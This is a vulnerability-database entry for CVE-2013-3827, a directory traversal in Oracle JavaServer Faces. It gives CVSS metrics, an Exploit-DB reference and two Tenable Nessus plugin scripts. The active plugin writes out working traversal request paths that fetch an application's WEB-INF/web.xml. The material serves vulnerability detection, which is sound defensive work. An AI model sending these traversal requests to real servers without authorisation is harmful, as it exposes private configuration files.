Vulnerabilities > CVE-2013-3827 - Directory Traversal vulnerability in Oracle JavaServer Faces
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
NONE Availability impact
NONE Summary
Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | 8 |
Exploit-Db
description | Oracle Glassfish Server 2.1.1/3.0.1 Multiple Subcomponent Resource Identifier Traversal Arbitrary File Access. CVE-2013-3827. Remote exploits for multiple pl... |
id | EDB-ID:38802 |
last seen | 2016-02-04 |
modified | 2013-10-15 |
published | 2013-10-15 |
reporter | Alex Kouzemtchenko |
source | https://www.exploit-db.com/download/38802/ |
title | Oracle Glassfish Server 2.1.1/3.0.1 Multiple Subcomponent Resource Identifier Traversal Arbitrary File Access |
Nessus
NASL family CGI abuses NASL id ORACLE_JAVASERVER_FACES_DIRECTORY_TRAVERSAL.NASL description The remote web server contains a JavaServer Faces application that is affected by multiple partial directory traversal vulnerabilities : - A defect exists in the handling of a resource identifier that allows for directory traversal within the application. - A defect exists in the handling of a library name that allows for directory traversal within the application. Note that the application may also be affected by a ViewState HMAC non-constant verification weakness; however, Nessus has not tested for this. Note that this plugin will only report the first vulnerable application. last seen 2020-06-01 modified 2020-06-02 plugin id 70963 published 2013-11-19 reporter This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/70963 title Oracle JavaServer Faces Multiple Partial Directory Traversals code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(70963); script_version("1.8"); script_cvs_date("Date: 2019/11/27"); script_cve_id("CVE-2013-3827"); script_bugtraq_id(63052); script_xref(name:"CERT", value:"526012"); script_name(english:"Oracle JavaServer Faces Multiple Partial Directory Traversals"); script_summary(english:"Tries to read an application's web.xml"); script_set_attribute(attribute:"synopsis", value: "A Java application hosted on the remote web server is affected by multiple partial directory traversal vulnerabilities."); script_set_attribute(attribute:"description", value: "The remote web server contains a JavaServer Faces application that is affected by multiple partial directory traversal vulnerabilities : - A defect exists in the handling of a resource identifier that allows for directory traversal within the application. - A defect exists in the handling of a library name that allows for directory traversal within the application. Note that the application may also be affected by a ViewState HMAC non-constant verification weakness; however, Nessus has not tested for this. Note that this plugin will only report the first vulnerable application."); # http://security.coverity.com/advisory/2013/Oct/two-path-traversal-defects-in-oracles-jsf2-implementation.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?5de4499a"); # http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?ac29c174"); script_set_attribute(attribute:"solution", value: "Install the patch per the instructions in the vendor's advisory."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2013/10/15"); script_set_attribute(attribute:"patch_publication_date", value:"2013/10/14"); script_set_attribute(attribute:"plugin_publication_date", value:"2013/11/19"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("http_version.nasl", "webmirror.nasl"); script_require_ports("Services/www", 80, 8080); exit(0); } include("audit.inc"); include("global_settings.inc"); include("http.inc"); include("misc_func.inc"); include("webapp_func.inc"); include("data_protection.inc"); port = get_http_port(default:8080); cgis = get_kb_list_or_exit('www/' + port + '/cgi'); urls = make_list(); # To identify Java applications that we can test the exploit on # we will look for files with the .jsf suffix from the KB and # send the request to the application directory rather than the file itself foreach cgi (make_list(cgis)) { match = eregmatch(pattern:"(^.*)(/.+\.(jsf))", string:cgi); if (match) { urls = make_list(urls, match[1]); if (!thorough_tests) break; } } if (max_index(urls) == 0) audit(AUDIT_WEB_FILES_NOT, "JavaServer Faces application", port); # Determine which traversal to test against target host paths = make_list('/javax.faces.resource.../WEB-INF/web.xml.jsf', '/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..'); vuln = FALSE; foreach url (urls) { foreach path (paths) { vuln_url = url + path; res = http_send_recv3( method : "GET", port : port, item : vuln_url, exit_on_fail : TRUE ); if ( res[0] =~ "200 OK" && "<web-app" >< res[2] && "<servlet-class>javax.faces." >< res[2] ) { vuln = TRUE; output = strstr(res[2], "<servlet-class>"); if (isnull(output)) output = res[2]; break; } } # Stop after first vulnerable web app is found if (vuln) break; } if (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.'); if (report_verbosity > 0) { max = 10; snip = '\n'+crap(data:"-", length:30)+" snip "+crap(data:"-", length:30); output = data_protection::sanitize_user_full_redaction(output:output); header = 'Nessus was able to verify the issue exists using the following request'; trailer = 'This produced the following output (truncated to '+max+' lines) :'+ '\n' + snip + '\n' + beginning_of_response(resp:output, max_lines:max) + '\n' + snip + '\n'; report = get_vuln_report( items : vuln_url, port : port, header : header, trailer : trailer ); security_warning(port:port, extra:report); } else security_warning(port);
NASL family Web Servers NASL id GLASSFISH_CPU_OCT_2013.NASL description The version of GlassFish Server running on the remote host is affected by multiple vulnerabilities in the following components : - Java Server Faces - Metro last seen 2020-06-01 modified 2020-06-02 plugin id 70482 published 2013-10-17 reporter This script is Copyright (C) 2013-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/70482 title Oracle GlassFish Server Multiple Vulnerabilities (October 2013 CPU) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(70482); script_version("1.12"); script_cvs_date("Date: 2018/11/15 20:50:25"); script_cve_id("CVE-2013-2172", "CVE-2013-3827", "CVE-2013-5816"); script_bugtraq_id(60846, 63052, 63054); script_xref(name:"CERT", value:"526012"); script_name(english:"Oracle GlassFish Server Multiple Vulnerabilities (October 2013 CPU)"); script_summary(english:"Checks the version of Oracle GlassFish."); script_set_attribute(attribute:"synopsis", value:"The remote web server is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description", value: "The version of GlassFish Server running on the remote host is affected by multiple vulnerabilities in the following components : - Java Server Faces - Metro"); script_set_attribute(attribute:"solution", value:"Upgrade to GlassFish Server 2.1.1.22 / 3.0.1.8 / 3.1.2.7 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); # https://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html#AppendixFMW script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?4930e546"); script_set_attribute(attribute:"vuln_publication_date", value:"2013/10/15"); script_set_attribute(attribute:"patch_publication_date", value:"2013/10/14"); script_set_attribute(attribute:"plugin_publication_date", value:"2013/10/17"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:glassfish_server"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Web Servers"); script_copyright(english:"This script is Copyright (C) 2013-2018 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("glassfish_detect.nasl"); script_require_keys("www/glassfish"); exit(0); } include("global_settings.inc"); include("misc_func.inc"); include("audit.inc"); include("glassfish.inc"); # # Main # # Check for GlassFish get_kb_item_or_exit('www/glassfish'); port = get_glassfish_port(default:8080); # Get the version number out of the KB. ver = get_kb_item_or_exit("www/" + port + "/glassfish/version"); banner = get_kb_item_or_exit("www/" + port + "/glassfish/source"); pristine = get_kb_item_or_exit("www/" + port + "/glassfish/version/pristine"); # Check if the installation is vulnerable. if (ver =~ "^2\.1\.1") fix = "2.1.1.22"; else if (ver =~ "^3\.0\.1") fix = "3.0.1.8"; else if (ver =~ "^3\.1\.2") fix = "3.1.2.7"; else fix = NULL; if (!isnull(fix) && ver_compare(ver:ver, fix:fix, strict:FALSE) < 0) { if (report_verbosity > 0) { report = '\n Version source : ' + banner + '\n Installed version : ' + pristine + '\n Fixed version : ' + fix + '\n'; security_warning(port:port, extra:report); } else security_warning(port); } else audit(AUDIT_LISTEN_NOT_VULN, "Oracle GlassFish", port, pristine);
Redhat
advisories |
|